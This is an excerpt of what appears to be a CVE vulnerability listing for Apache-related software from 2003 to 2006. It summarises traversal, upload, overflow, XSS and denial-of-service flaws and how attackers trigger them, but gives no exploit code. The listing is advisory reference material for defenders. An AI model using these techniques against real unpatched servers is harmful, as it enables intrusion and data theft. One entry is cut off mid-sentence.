3351| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
3352| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
3353| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
3354| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
3355| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
3356| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
3357| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
3358| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
3359| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3360| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
3361| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
3362| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
3363| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
3364| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
3365| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
3366| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
3367| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
3368| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
3369| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
3370| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
3371| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
3372| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
3373| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
3374| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
3375| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
3376| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
3377| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
3378| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
3379| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
3380| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
3381| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
3382| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
3383| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
3384| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
3385| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
3386| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
3387| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
3388| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
3389| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
3390| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
3391| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
3392| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
3393| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
3394| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
3395| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
3396| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
3397| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
3398| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
3399| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
3400| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
3401| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
3402| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
3403| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
3404| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
3405| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
3406| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
3407| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
3408| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
3409| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
3410| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
3411| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
3412| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
3413| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
3414| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
3415| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
3416| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
3417| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
3418| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
3419| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
3420| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
3421| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
3422| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
3423| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
3424| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
3425| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
3426| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
3427| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
3428| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
3429| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
3430| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
3431| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
3432| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
3433| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
3434| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
3435| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
3436| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
3437| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
3438| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
3439| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
3440| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
3441| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
3442| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
3443| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
3444| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
3445| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
3446| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
3447| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
3448| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
3449| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
3450| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
3451| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
3452| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
3453| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
3454| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
3455| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
3456| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
3457| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
3458| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
3459| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
3460| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
3461| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
3462| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
3463| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
3464| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
3465| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
3466| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
3467| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
3468| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
3469| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
3470| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
3471| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
3472| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
3473| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
3474| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
3475| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
3476| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
3477| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
3478| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
3479| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
3480| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
